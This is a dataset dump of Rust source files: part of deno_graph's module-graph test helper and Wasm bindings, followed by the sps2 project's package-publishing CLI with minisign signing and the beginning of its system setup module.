          if !diagnostics.is_empty() {
            eprintln!("== Output ==");
            eprintln!("{}", module_output_text);
            eprintln!("== Source ==");
            eprintln!("{}", module.text());
            eprintln!("== {} == \n\n{}", specifier, diagnostics.join("\n"));
            panic!("FAILED");
          }
        }
        // renders the go-to-definition targets for an exported symbol,
        // truncating long declaration texts to first/last two lines
        let get_symbol_text =
          |module_symbol: deno_graph::symbols::ModuleInfoRef,
           symbol_id: deno_graph::symbols::SymbolId| {
            let symbol = module_symbol.symbol(symbol_id).unwrap();
            let items = root_symbol
              .go_to_definitions_or_unresolveds(module_symbol, symbol)
              .collect::<Vec<_>>();
            if items.is_empty() {
              "NONE".to_string()
            } else {
              let mut results = Vec::new();
              for definition_or_unresolved in items {
                match definition_or_unresolved {
                  DefinitionOrUnresolved::Definition(definition) => {
                    let decl_text = {
                      let decl_text = definition.text();
                      let lines = decl_text.split('\n').collect::<Vec<_>>();
                      if lines.len() > 4 {
                        lines[0..2]
                          .iter()
                          .chain(std::iter::once(&"..."))
                          .chain(&lines[lines.len() - 2..])
                          .cloned()
                          .collect::<Vec<_>>()
                      } else {
                        lines
                      }
                      .into_iter()
                      .map(|line| format!(" {}", line).trim_end().to_string())
                      .collect::<Vec<_>>()
                      .join("\n")
                    };
                    let range = definition.byte_range();
                    results.push(format!(
                      "{}:{}..{}\n{}",
                      definition.module.specifier(),
                      range.start,
                      range.end,
                      decl_text
                    ));
                  }
                  DefinitionOrUnresolved::Unresolved(unresolved) => results
                    .push(format!(
                      "{}\n Unresolved {:?} ({:?})",
                      unresolved.module.specifier(),
                      unresolved.kind,
                      unresolved.parts,
                    )),
                }
              }
              results.join("\n")
            }
          };
        let exports = entrypoint_symbol.exports(&root_symbol).resolved;
        if !exports.is_empty() {
          output_text.push_str("== export definitions ==\n");
          for (name, resolved) in exports {
            let resolved = resolved.as_resolved_export();
            let position = get_symbol_text(resolved.module, resolved.symbol_id);
            output_text.push_str(&format!("[{}]: {}\n", name, position));
          }
        }
        output_text
      },
    }
  }
}
/// Resolver that maps `jsr:` package requirements onto local workspace
/// members before falling back to regular import resolution.
#[derive(Debug)]
struct WorkspaceMemberResolver {
  members: Vec<WorkspaceMember>,
}
impl deno_graph::source::Resolver for WorkspaceMemberResolver {
  /// Resolves `jsr:` specifiers against the configured workspace members'
  /// export maps; every other specifier uses plain import resolution.
  ///
  /// # Panics
  /// Panics (test-only code) when a matching member lacks the requested
  /// export.
  fn resolve(
    &self,
    specifier_text: &str,
    referrer_range: &deno_graph::Range,
    _mode: deno_graph::source::ResolutionKind,
  ) -> Result<deno_ast::ModuleSpecifier, deno_graph::source::ResolveError> {
    if let Ok(package_ref) = JsrPackageReqReference::from_str(specifier_text) {
      for workspace_member in &self.members {
        // a member without a version matches any version requirement
        if workspace_member.name == package_ref.req().name
          && workspace_member
            .version
            .as_ref()
            .map(|version| package_ref.req().version_req.matches(version))
            .unwrap_or(true)
        {
          // no sub path means the default "." export
          let export_name = package_ref.sub_path().unwrap_or(".");
          let export = workspace_member.exports.get(export_name).unwrap();
          return Ok(workspace_member.base.join(export).unwrap());
        }
      }
    }
    Ok(deno_graph::resolve_import(
      specifier_text,
      &referrer_range.specifier,
    )?)
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/lib/lib.rs | lib/lib.rs | // Copyright 2018-2024 the Deno authors. MIT license.
// remove this after https://github.com/rustwasm/wasm-bindgen/issues/2774 is released
#![allow(clippy::unused_unit)]
#![deny(clippy::disallowed_methods)]
#![deny(clippy::disallowed_types)]
#![deny(clippy::unnecessary_wraps)]
use deno_error::JsErrorBox;
use deno_graph::resolve_import;
use deno_graph::source::load_data_url;
use deno_graph::source::CacheInfo;
use deno_graph::source::LoadFuture;
use deno_graph::source::LoadOptions;
use deno_graph::source::Loader;
use deno_graph::source::NullFileSystem;
use deno_graph::source::ResolutionKind;
use deno_graph::source::ResolveError;
use deno_graph::source::Resolver;
use deno_graph::source::DEFAULT_JSX_IMPORT_SOURCE_MODULE;
use deno_graph::BuildOptions;
use deno_graph::GraphKind;
use deno_graph::ModuleGraph;
use deno_graph::ModuleSpecifier;
use deno_graph::Range;
use deno_graph::ReferrerImports;
use deno_graph::SpecifierError;
use std::collections::HashMap;
use std::sync::Arc;
use futures::future;
use serde::Deserialize;
use serde::Serialize;
use wasm_bindgen::prelude::*;
/// Errors surfaced to JavaScript callers of the Wasm bindings.
#[derive(Debug, thiserror::Error, deno_error::JsError)]
#[class(generic)]
pub enum WasmError {
  /// The JS `load()` callback rejected or threw.
  #[error("load rejected or errored")]
  Load,
  /// The JS `resolve()` callback threw.
  #[error("JavaScript resolve threw.")]
  JavaScriptResolve,
  /// The JS `resolveTypes()` callback threw.
  #[error("JavaScript resolveTypes() function threw.")]
  JavaScriptResolveTypes,
  /// A value returned from JS could not be deserialized.
  #[error("{0}")]
  // String because serde_wasm_bindgen::Error is not thread-safe.
  Deserialize(String),
}
/// `Loader` implementation that delegates module loading to JavaScript
/// callbacks supplied from the host environment.
pub struct JsLoader {
  // JS function invoked to fetch a module's source (may return a promise).
  load: js_sys::Function,
  // Optional JS function returning cache metadata for a specifier.
  maybe_cache_info: Option<js_sys::Function>,
}
impl JsLoader {
pub fn new(
load: js_sys::Function,
maybe_cache_info: Option<js_sys::Function>,
) -> Self {
Self {
load,
maybe_cache_info,
}
}
}
impl Loader for JsLoader {
  /// Asks the optional JS callback for cache info. Any JS error or
  /// deserialization failure is flattened to `None`.
  fn get_cache_info(&self, specifier: &ModuleSpecifier) -> Option<CacheInfo> {
    if let Some(cache_info_fn) = &self.maybe_cache_info {
      let this = JsValue::null();
      let arg0 = JsValue::from(specifier.to_string());
      let value = cache_info_fn.call1(&this, &arg0).ok()?;
      let cache_info: CacheInfo = serde_wasm_bindgen::from_value(value).ok()?;
      Some(cache_info)
    } else {
      None
    }
  }
  /// Loads a module: `data:` URLs are decoded in-process; everything else
  /// is delegated to the JS `load` callback, whose return value (possibly
  /// a promise) is awaited and deserialized.
  fn load(
    &self,
    specifier: &ModuleSpecifier,
    options: LoadOptions,
  ) -> LoadFuture {
    // camelCase mirror of the load options passed across the JS boundary.
    #[derive(Serialize)]
    #[serde(rename_all = "camelCase")]
    struct JsLoadOptions {
      is_dynamic: bool,
      cache_setting: &'static str,
      checksum: Option<String>,
    }
    if specifier.scheme() == "data" {
      // Decode data: URLs locally — no JS round-trip needed.
      Box::pin(future::ready(load_data_url(specifier).map_err(|err| {
        deno_graph::source::LoadError::Other(Arc::new(JsErrorBox::from_err(
          err,
        )))
      })))
    } else {
      let specifier = specifier.clone();
      let context = JsValue::null();
      let arg1 = JsValue::from(specifier.to_string());
      let arg2 = serde_wasm_bindgen::to_value(&JsLoadOptions {
        is_dynamic: options.in_dynamic_branch,
        cache_setting: options.cache_setting.as_js_str(),
        checksum: options.maybe_checksum.map(|c| c.into_string()),
      })
      .unwrap();
      // Call JS synchronously; the (possible) promise is awaited below.
      let result = self.load.call2(&context, &arg1, &arg2);
      let f = async move {
        let response = match result {
          Ok(result) => {
            // Promise::resolve also accepts plain values, so this handles
            // both sync and async JS callbacks.
            wasm_bindgen_futures::JsFuture::from(js_sys::Promise::resolve(
              &result,
            ))
            .await
          }
          Err(err) => Err(err),
        };
        response
          .map(|value| serde_wasm_bindgen::from_value(value).unwrap())
          .map_err(|_| {
            deno_graph::source::LoadError::Other(Arc::new(
              JsErrorBox::from_err(WasmError::Load),
            ))
          })
      };
      Box::pin(f)
    }
  }
}
/// `Resolver` implementation backed by optional JS callbacks and optional
/// JSX import-source overrides; each field falls back to default behavior
/// when `None`.
#[derive(Debug)]
pub struct JsResolver {
  maybe_default_jsx_import_source: Option<String>,
  maybe_default_jsx_import_source_types: Option<String>,
  maybe_jsx_import_source_module: Option<String>,
  // JS callback for specifier resolution; falls back to `resolve_import`.
  maybe_resolve: Option<js_sys::Function>,
  // JS callback mapping a module to its types; falls back to no mapping.
  maybe_resolve_types: Option<js_sys::Function>,
}
impl JsResolver {
pub fn new(
maybe_default_jsx_import_source: Option<String>,
maybe_default_jsx_import_source_types: Option<String>,
maybe_jsx_import_source_module: Option<String>,
maybe_resolve: Option<js_sys::Function>,
maybe_resolve_types: Option<js_sys::Function>,
) -> Self {
Self {
maybe_default_jsx_import_source,
maybe_default_jsx_import_source_types,
maybe_jsx_import_source_module,
maybe_resolve,
maybe_resolve_types,
}
}
}
/// Shape of the value returned by the JS `resolveTypes()` callback.
#[derive(Debug, Deserialize, PartialEq, Eq)]
struct JsResolveTypesResponse {
  // Specifier of the types module (e.g. a `.d.ts` file).
  types: ModuleSpecifier,
  // Optional range describing where the types mapping was declared.
  source: Option<Range>,
}
impl Resolver for JsResolver {
  /// Returns the configured default JSX import source, ignoring the referrer.
  fn default_jsx_import_source(
    &self,
    _referrer: &ModuleSpecifier,
  ) -> Option<String> {
    self.maybe_default_jsx_import_source.clone()
  }
  /// Returns the configured default JSX types import source, ignoring the
  /// referrer.
  fn default_jsx_import_source_types(
    &self,
    _referrer: &ModuleSpecifier,
  ) -> Option<String> {
    self.maybe_default_jsx_import_source_types.clone()
  }
  /// Returns the configured JSX import-source module, or the library default
  /// when none was configured.
  fn jsx_import_source_module(&self, _referrer: &ModuleSpecifier) -> &str {
    self
      .maybe_jsx_import_source_module
      .as_deref()
      .unwrap_or(DEFAULT_JSX_IMPORT_SOURCE_MODULE)
  }
  /// Resolves a specifier via the JS callback when one was provided (the
  /// callback must return a URL string), otherwise via standard import
  /// resolution against the referrer.
  fn resolve(
    &self,
    specifier: &str,
    referrer_range: &Range,
    _kind: ResolutionKind,
  ) -> Result<ModuleSpecifier, ResolveError> {
    if let Some(resolve) = &self.maybe_resolve {
      let this = JsValue::null();
      let arg1 = JsValue::from(specifier);
      let arg2 = JsValue::from(referrer_range.specifier.to_string());
      // A throwing JS callback is mapped to a dedicated error variant.
      let value = match resolve.call2(&this, &arg1, &arg2) {
        Ok(value) => value,
        Err(_) => {
          return Err(JsErrorBox::from_err(WasmError::JavaScriptResolve).into())
        }
      };
      let value: String = match serde_wasm_bindgen::from_value(value) {
        Ok(value) => value,
        Err(err) => {
          return Err(
            JsErrorBox::from_err(WasmError::Deserialize(err.to_string()))
              .into(),
          )
        }
      };
      ModuleSpecifier::parse(&value)
        .map_err(|err| ResolveError::Specifier(SpecifierError::InvalidUrl(err)))
    } else {
      resolve_import(specifier, &referrer_range.specifier)
        .map_err(|err| err.into())
    }
  }
  /// Asks the JS `resolveTypes()` callback (when present) for the types
  /// module of `specifier`; returns `Ok(None)` when no callback exists or
  /// the callback reports no mapping.
  fn resolve_types(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Result<Option<(ModuleSpecifier, Option<Range>)>, ResolveError> {
    if let Some(resolve_types) = &self.maybe_resolve_types {
      let this = JsValue::null();
      let arg1 = JsValue::from(specifier.to_string());
      let value = resolve_types
        .call1(&this, &arg1)
        .map_err(|_| JsErrorBox::from_err(WasmError::JavaScriptResolveTypes))?;
      let result: Option<JsResolveTypesResponse> =
        serde_wasm_bindgen::from_value(value).map_err(|err| {
          JsErrorBox::from_err(WasmError::Deserialize(err.to_string()))
        })?;
      Ok(result.map(|v| (v.types, v.source)))
    } else {
      Ok(None)
    }
  }
}
/// Wasm entry point: builds a module graph from `roots` using JS-provided
/// load/resolve callbacks and returns the serialized graph as a JS object.
///
/// Errors from argument deserialization or URL parsing are returned as JS
/// `Error` values; build errors are embedded in the serialized graph.
#[wasm_bindgen(js_name = createGraph)]
#[allow(clippy::too_many_arguments)]
pub async fn js_create_graph(
  roots: JsValue,
  load: js_sys::Function,
  maybe_default_jsx_import_source: Option<String>,
  maybe_default_jsx_import_source_types: Option<String>,
  maybe_jsx_import_source_module: Option<String>,
  maybe_cache_info: Option<js_sys::Function>,
  maybe_resolve: Option<js_sys::Function>,
  maybe_resolve_types: Option<js_sys::Function>,
  maybe_graph_kind: Option<String>,
  maybe_imports: JsValue,
) -> Result<JsValue, JsValue> {
  console_error_panic_hook::set_once();
  let roots_vec: Vec<String> = serde_wasm_bindgen::from_value(roots)
    .map_err(|err| JsValue::from(js_sys::Error::new(&err.to_string())))?;
  let maybe_imports_map: Option<HashMap<String, Vec<String>>> =
    serde_wasm_bindgen::from_value(maybe_imports)
      .map_err(|err| JsValue::from(js_sys::Error::new(&err.to_string())))?;
  let loader = JsLoader::new(load, maybe_cache_info);
  // Only construct a custom resolver when at least one override is present;
  // otherwise the graph builder uses its default resolution.
  let maybe_resolver = if maybe_default_jsx_import_source.is_some()
    || maybe_default_jsx_import_source_types.is_some()
    || maybe_jsx_import_source_module.is_some()
    || maybe_resolve.is_some()
    || maybe_resolve_types.is_some()
  {
    Some(JsResolver::new(
      maybe_default_jsx_import_source,
      maybe_default_jsx_import_source_types,
      maybe_jsx_import_source_module,
      maybe_resolve,
      maybe_resolve_types,
    ))
  } else {
    None
  };
  // Parse each root string into a specifier, failing fast on bad URLs.
  let mut roots = Vec::with_capacity(roots_vec.len());
  for root in roots_vec.into_iter() {
    let root = ModuleSpecifier::parse(&root)
      .map_err(|err| JsValue::from(js_sys::Error::new(&err.to_string())))?;
    roots.push(root);
  }
  // Convert the optional referrer -> imports map into ReferrerImports.
  let imports = if let Some(imports_map) = maybe_imports_map {
    let mut imports = Vec::new();
    for (referrer_str, specifier_vec) in imports_map.into_iter() {
      let referrer = ModuleSpecifier::parse(&referrer_str)
        .map_err(|err| JsValue::from(js_sys::Error::new(&err.to_string())))?;
      imports.push(ReferrerImports {
        referrer,
        imports: specifier_vec,
      });
    }
    imports
  } else {
    Vec::new()
  };
  // Unrecognized or absent kind strings default to a full graph.
  let graph_kind = match maybe_graph_kind.as_deref() {
    Some("typesOnly") => GraphKind::TypesOnly,
    Some("codeOnly") => GraphKind::CodeOnly,
    _ => GraphKind::All,
  };
  let mut graph = ModuleGraph::new(graph_kind);
  graph
    .build(
      roots,
      imports,
      &loader,
      BuildOptions {
        is_dynamic: false,
        skip_dynamic_deps: false,
        unstable_bytes_imports: true,
        unstable_text_imports: true,
        resolver: maybe_resolver.as_ref().map(|r| r as &dyn Resolver),
        // todo(dsherret): actually implement this for Wasm users
        // and don't just use a RealSys here as it would be better
        // to have a way for users to provide their own file system
        // via the JS API.
        file_system: &NullFileSystem,
        jsr_version_resolver: Default::default(),
        jsr_url_provider: Default::default(),
        npm_resolver: None,
        locker: None,
        passthrough_jsr_specifiers: false,
        module_analyzer: Default::default(),
        module_info_cacher: Default::default(),
        reporter: None,
        executor: Default::default(),
        jsr_metadata_store: None,
      },
    )
    .await;
  // Serialize maps as plain JS objects rather than ES Maps.
  let serializer =
    serde_wasm_bindgen::Serializer::new().serialize_maps_as_objects(true);
  Ok(graph.serialize(&serializer).unwrap())
}
/// Wasm entry point: parses a single module from raw `content` (without
/// building a full graph) and returns it serialized as a JS object.
#[allow(clippy::too_many_arguments)]
#[wasm_bindgen(js_name = parseModule)]
pub async fn js_parse_module(
  specifier: String,
  maybe_headers: JsValue,
  maybe_default_jsx_import_source: Option<String>,
  maybe_default_jsx_import_types_source: Option<String>,
  maybe_jsx_import_source_module: Option<String>,
  content: Vec<u8>,
  maybe_resolve: Option<js_sys::Function>,
  maybe_resolve_types: Option<js_sys::Function>,
) -> Result<JsValue, JsValue> {
  console_error_panic_hook::set_once();
  let maybe_headers: Option<HashMap<String, String>> =
    serde_wasm_bindgen::from_value(maybe_headers)
      .map_err(|err| js_sys::Error::new(&err.to_string()))?;
  let specifier = ModuleSpecifier::parse(&specifier)
    .map_err(|err| js_sys::Error::new(&err.to_string()))?;
  // Same override-detection logic as js_create_graph: only build a custom
  // resolver when at least one JS-side override exists.
  let maybe_resolver = if maybe_default_jsx_import_source.is_some()
    || maybe_default_jsx_import_types_source.is_some()
    || maybe_jsx_import_source_module.is_some()
    || maybe_resolve.is_some()
    || maybe_resolve_types.is_some()
  {
    Some(JsResolver::new(
      maybe_default_jsx_import_source,
      maybe_default_jsx_import_types_source,
      maybe_jsx_import_source_module,
      maybe_resolve,
      maybe_resolve_types,
    ))
  } else {
    None
  };
  match deno_graph::parse_module(deno_graph::ParseModuleOptions {
    graph_kind: GraphKind::All,
    specifier,
    maybe_headers,
    mtime: None,
    content: content.into(),
    file_system: &NullFileSystem,
    jsr_url_provider: Default::default(),
    maybe_resolver: maybe_resolver.as_ref().map(|r| r as &dyn Resolver),
    module_analyzer: Default::default(),
  })
  .await
  {
    Ok(module) => {
      let serializer =
        serde_wasm_bindgen::Serializer::new().serialize_maps_as_objects(true);
      Ok(module.serialize(&serializer).unwrap())
    }
    Err(err) => Err(js_sys::Error::new(&err.to_string()).into()),
  }
}
#[cfg(test)]
mod tests {
  use super::*;
  use deno_graph::PositionRange;
  use serde_json::from_value;
  use serde_json::json;
  /// Verifies `JsResolveTypesResponse` deserialization, with and without the
  /// optional `source` field.
  #[test]
  fn test_deserialize_types_response() {
    // With a source: the range inside it defaults to a zeroed position.
    let actual: Option<JsResolveTypesResponse> = from_value(json!({
      "types": "https://deno.land/x/mod.d.ts",
      "source": {
        "specifier": "file:///package.json"
      }
    }))
    .unwrap();
    assert_eq!(
      actual,
      Some(JsResolveTypesResponse {
        types: ModuleSpecifier::parse("https://deno.land/x/mod.d.ts").unwrap(),
        source: Some(Range {
          specifier: ModuleSpecifier::parse("file:///package.json").unwrap(),
          range: PositionRange::zeroed(),
          resolution_mode: None,
        })
      })
    );
    // Without a source: the field deserializes to None.
    let actual: Option<JsResolveTypesResponse> = from_value(json!({
      "types": "https://deno.land/x/mod.d.ts",
    }))
    .unwrap();
    assert_eq!(
      actual,
      Some(JsResolveTypesResponse {
        types: ModuleSpecifier::parse("https://deno.land/x/mod.d.ts").unwrap(),
        source: None
      })
    );
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sbs/src/main.rs | apps/sbs/src/main.rs | #![warn(mismatched_lifetime_syntaxes)]
#![deny(clippy::pedantic, unsafe_code)]
use clap::{Parser, Subcommand};
use sps2_errors::Error;
use sps2_repository::keys as repo_keys;
use sps2_repository::{LocalStore, Publisher};
use std::path::PathBuf;
// Top-level CLI for the `sbs` tool. NOTE: plain `//` comments are used on
// clap-derive items because `///` doc comments would change --help output.
#[derive(Parser, Debug)]
#[command(name = "sbs")]
#[command(version = env!("CARGO_PKG_VERSION"))]
#[command(about = "SPS2 build/publish tooling", long_about = None)]
struct Cli {
    // The selected subcommand; dispatch happens in main().
    #[command(subcommand)]
    command: Commands,
}
// Subcommands for sbs. Existing `///` comments are clap help text and are
// kept verbatim; review notes use `//` so --help output is unchanged.
#[derive(Subcommand, Debug)]
enum Commands {
    /// Publish a single package (.sp) into the repository and update the index
    Publish {
        /// Path to the .sp file
        package: PathBuf,
        /// Repository directory path (local filesystem)
        #[arg(long, value_name = "DIR")]
        repo_dir: PathBuf,
        /// Base URL for download links in index (e.g., <http://localhost:8680>)
        #[arg(long, value_name = "URL")]
        base_url: String,
        /// Minisign secret key path
        #[arg(long, value_name = "PATH")]
        key: PathBuf,
        /// Optional passphrase or keychain string for minisign
        // When omitted, handlers prompt interactively via maybe_prompt_pass.
        #[arg(long)]
        pass: Option<String>,
    },
    /// Rescan repo directory and rebuild+sign index
    UpdateIndices {
        /// Repository directory path (local filesystem)
        #[arg(long, value_name = "DIR")]
        repo_dir: PathBuf,
        /// Base URL for download links in index
        #[arg(long, value_name = "URL")]
        base_url: String,
        /// Minisign secret key path
        #[arg(long, value_name = "PATH")]
        key: PathBuf,
        /// Optional passphrase or keychain string for minisign
        #[arg(long)]
        pass: Option<String>,
    },
    /// Initialize a repository with keys.json
    RepoInit {
        /// Repository directory path
        #[arg(long, value_name = "DIR")]
        repo_dir: PathBuf,
        /// Use an existing Minisign public key file (.pub). If not provided, you can --generate.
        #[arg(long, value_name = "PUBFILE")]
        pubkey: Option<PathBuf>,
        /// Generate a new key pair
        #[arg(long, conflicts_with = "pubkey")]
        generate: bool,
        /// Output path for generated secret key (required with --generate)
        #[arg(long, requires = "generate", value_name = "PATH")]
        out_secret: Option<PathBuf>,
        /// Output path for generated public key (required with --generate)
        #[arg(long, requires = "generate", value_name = "PATH")]
        out_public: Option<PathBuf>,
        /// Optional comment to embed into keys.json
        #[arg(long)]
        comment: Option<String>,
    },
}
/// Entry point: parses the CLI and dispatches to the matching handler,
/// propagating any handler error to the process exit status.
#[tokio::main]
async fn main() -> Result<(), Error> {
    init_tracing();
    // Each arm evaluates to the handler's Result; the match itself is the
    // function's tail expression, so errors flow straight out.
    match Cli::parse().command {
        Commands::Publish {
            package,
            repo_dir,
            base_url,
            key,
            pass,
        } => publish_one(package, repo_dir, base_url, key, pass).await,
        Commands::UpdateIndices {
            repo_dir,
            base_url,
            key,
            pass,
        } => update_indices(repo_dir, base_url, key, pass).await,
        Commands::RepoInit {
            repo_dir,
            pubkey,
            generate,
            out_secret,
            out_public,
            comment,
        } => {
            // CLI has no flags for pass/unencrypted yet; use safe defaults.
            repo_init(RepoInitOpts {
                repo_dir,
                pubkey,
                generate,
                out_secret,
                out_public,
                pass: None,
                unencrypted: false,
                comment,
            })
            .await
        }
    }
}
/// Installs the global tracing subscriber with a filter taken from the
/// environment; if a subscriber is already set, the error is ignored.
fn init_tracing() {
    let filter = tracing_subscriber::EnvFilter::from_default_env();
    let _ = tracing_subscriber::fmt().with_env_filter(filter).try_init();
}
/// Copies a `.sp` package into the repository, signs it if no detached
/// signature exists yet, and rebuilds the signed index.
///
/// # Errors
/// Returns an error if the package filename is not valid UTF-8, on any
/// filesystem failure, or if signing / index publication fails.
async fn publish_one(
    package: PathBuf,
    repo_dir: PathBuf,
    base_url: String,
    key: PathBuf,
    pass: Option<String>,
) -> Result<(), Error> {
    // Copy the .sp file into the repository directory.
    let filename = package
        .file_name()
        .and_then(|s| s.to_str())
        .ok_or_else(|| Error::internal("invalid package filename"))?
        .to_string();
    let dest = repo_dir.join(&filename);
    tokio::fs::create_dir_all(&repo_dir).await?;
    tokio::fs::copy(&package, &dest).await?;
    // The detached signature must be named after the package file
    // (<package>.minisig, the minisign convention) so each package gets its
    // own signature. Previously a fixed "(unknown).minisig" literal was used,
    // so every published package clobbered the same signature file.
    let sig_path = repo_dir.join(format!("{filename}.minisig"));
    let mut pass_final = pass;
    if !sig_path.exists() {
        // Prompt only when we actually need to sign and no passphrase was
        // supplied; maybe_prompt_pass passes an existing value through.
        pass_final =
            maybe_prompt_pass(pass_final, "Enter key passphrase (press Enter for none): ")?;
        let data = tokio::fs::read(&dest).await?;
        let sig = sps2_net::signing::minisign_sign_bytes(
            &data,
            &key,
            pass_final.as_deref(),
            Some("sps2 package signature"),
            Some(&filename),
        )?;
        tokio::fs::write(&sig_path, sig).await?;
    }
    // Rebuild and sign the index, reusing any passphrase gathered above.
    update_indices(repo_dir, base_url, key, pass_final).await
}
/// Rescans `repo_dir` for packages, rebuilds the index, and publishes it
/// signed with `key`.
///
/// # Errors
/// Returns an error if prompting for a passphrase, scanning the directory,
/// or signing/publishing the index fails.
async fn update_indices(
    repo_dir: PathBuf,
    base_url: String,
    key: PathBuf,
    pass: Option<String>,
) -> Result<(), Error> {
    // maybe_prompt_pass already returns an existing passphrase untouched,
    // so the previous `if pass.is_none()` branch was redundant.
    let pass_final = maybe_prompt_pass(
        pass,
        "Enter key passphrase for signing index (press Enter for none): ",
    )?;
    let store = LocalStore::new(&repo_dir);
    let publisher = Publisher::new(store, base_url);
    let artifacts = publisher.scan_packages_local_dir(&repo_dir).await?;
    let index = publisher.build_index(&artifacts);
    publisher
        .publish_index(&index, &key, pass_final.as_deref())
        .await?;
    println!(
        "Updated index with {} packages in {}",
        artifacts.len(),
        repo_dir.display()
    );
    Ok(())
}
/// Returns `current` unchanged when a passphrase is already present;
/// otherwise prompts on the terminal. An empty entry maps to `None`.
fn maybe_prompt_pass(current: Option<String>, prompt: &str) -> Result<Option<String>, Error> {
    match current {
        Some(existing) => Ok(Some(existing)),
        None => {
            let entered = rpassword::prompt_password(prompt)
                .map_err(|e| Error::internal(format!("failed to read passphrase: {e}")))?;
            Ok(if entered.is_empty() {
                None
            } else {
                Some(entered)
            })
        }
    }
}
/// Options bundle for `repo_init`, mirroring the `RepoInit` CLI flags plus
/// two fields (`pass`, `unencrypted`) not yet exposed on the CLI.
#[derive(Debug)]
struct RepoInitOpts {
    // Repository directory to initialize (created if missing).
    repo_dir: PathBuf,
    // Existing Minisign public key file; mutually exclusive with `generate`.
    pubkey: Option<PathBuf>,
    // When true, generate a fresh key pair instead of importing one.
    generate: bool,
    // Destination for the generated secret key; required when `generate`.
    out_secret: Option<PathBuf>,
    // Destination for the generated public key; required when `generate`.
    out_public: Option<PathBuf>,
    // Passphrase for the generated secret key; prompted when None.
    pass: Option<String>,
    // When true, write the secret key unencrypted (testing only).
    unencrypted: bool,
    // Optional comment embedded into keys.json.
    comment: Option<String>,
}
/// Initializes a repository directory with a `keys.json` trust file, either
/// importing an existing Minisign public key or generating a new key pair.
///
/// # Errors
/// Returns an error on filesystem failures, key generation/serialization
/// failures, mismatched passphrases, or when neither `pubkey` nor
/// `generate` was requested.
///
/// # Panics
/// Panics via `expect` if `generate` is set without `out_secret` /
/// `out_public`; the CLI's `requires = "generate"` constraints are assumed
/// to prevent this — confirm for non-CLI callers.
async fn repo_init(opts: RepoInitOpts) -> Result<(), Error> {
    let RepoInitOpts {
        repo_dir,
        pubkey,
        generate,
        out_secret,
        out_public,
        pass,
        unencrypted,
        comment,
    } = opts;
    tokio::fs::create_dir_all(&repo_dir).await?;
    // Obtain the base64 public key, either from a provided file or by
    // generating a fresh key pair.
    let pk_base64 = if let Some(pub_path) = pubkey {
        let content = tokio::fs::read_to_string(&pub_path).await?;
        repo_keys::extract_base64(&content)
    } else if generate {
        // Generate keypair; encrypt secret key unless --unencrypted
        use minisign::KeyPair;
        let KeyPair { pk, sk } = KeyPair::generate_unencrypted_keypair()
            .map_err(|e| Error::internal(format!("keypair generation failed: {e}")))?;
        // Write secret key
        let sk_path = out_secret.expect("out_secret required with --generate");
        // Decide the passphrase: none (with a loud warning), the provided
        // one, or an interactively confirmed one.
        let passphrase = if unencrypted {
            eprintln!(
                "WARNING: writing UNENCRYPTED secret key to {}. This is unsafe; use only for throwaway local testing.",
                sk_path.display()
            );
            None
        } else if let Some(p) = pass {
            Some(p)
        } else {
            let p1 = rpassword::prompt_password("Enter new key passphrase: ")
                .map_err(|e| Error::internal(format!("failed to read passphrase: {e}")))?;
            let p2 = rpassword::prompt_password("Repeat passphrase: ")
                .map_err(|e| Error::internal(format!("failed to read passphrase: {e}")))?;
            if p1 != p2 {
                return Err(Error::internal("passphrases do not match"));
            }
            // Short passphrases are allowed, but warned about.
            if p1.len() < 8 {
                eprintln!("WARNING: passphrase is short; consider 12+ characters");
            }
            Some(p1)
        };
        let sk_box = sk
            .to_box(passphrase.as_deref())
            .map_err(|e| Error::internal(format!("secret key serialize failed: {e}")))?;
        tokio::fs::write(&sk_path, sk_box.to_string()).await?;
        // Write public key
        let pk_path = out_public.expect("out_public required with --generate");
        let pk_box = pk
            .to_box()
            .map_err(|e| Error::internal(format!("public key serialize failed: {e}")))?;
        tokio::fs::write(&pk_path, pk_box.to_string()).await?;
        // Extract base64 from box
        repo_keys::extract_base64(&pk_box.to_string())
    } else {
        return Err(Error::internal(
            "Provide --pubkey <file> or --generate with --out-secret/--out-public",
        ));
    };
    // Record the single trusted key in the repository's keys.json.
    let repo = repo_keys::make_single_key(pk_base64, comment)?;
    repo_keys::write_keys_json(&repo_dir, &repo).await?;
    println!("Initialized repo at {} with keys.json", repo_dir.display());
    Ok(())
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/setup.rs | apps/sps2/src/setup.rs | //! System setup and initialization
use crate::error::CliError;
use sps2_builder::Builder;
use sps2_config::{fixed_paths, Config};
use sps2_index::IndexManager;
use sps2_net::NetClient;
use sps2_resolver::Resolver;
use sps2_state::StateManager;
use sps2_store::PackageStore;
use std::path::{Path, PathBuf};
use tracing::{debug, info, warn};
/// System setup and component initialization
/// System setup and component initialization.
///
/// Components are `None` until `initialize` runs; the accessor methods
/// panic when called before initialization.
pub struct SystemSetup {
    config: Config,
    store: Option<PackageStore>,
    state: Option<StateManager>,
    index: Option<IndexManager>,
    net: Option<NetClient>,
    resolver: Option<Resolver>,
    builder: Option<Builder>,
}
impl SystemSetup {
/// Create new system setup
pub fn new(config: Config) -> Self {
Self {
config,
store: None,
state: None,
index: None,
net: None,
resolver: None,
builder: None,
}
}
    /// Initialize all system components
    ///
    /// # Errors
    /// Returns a `CliError::Setup` if any directory creation, component
    /// initialization, or startup maintenance step fails.
    pub async fn initialize(&mut self) -> Result<(), CliError> {
        info!("Initializing sps2 system components");
        // Check and create system directories
        self.ensure_system_directories().await?;
        // Initialize core components. Order matters: the resolver consumes
        // the index and the builder consumes the net client, so those two
        // must come after init_index/init_net.
        self.init_store().await?;
        self.init_state().await?;
        self.init_index().await?;
        self.init_net().await?;
        self.init_resolver().await?;
        self.init_builder().await?;
        // Initialize platform cache for optimized tool discovery
        self.init_platform_cache().await?;
        // Perform startup maintenance
        self.startup_maintenance().await?;
        info!("System initialization completed");
        Ok(())
    }
    /// Get package store
    ///
    /// # Panics
    /// Panics if called before [`Self::initialize`].
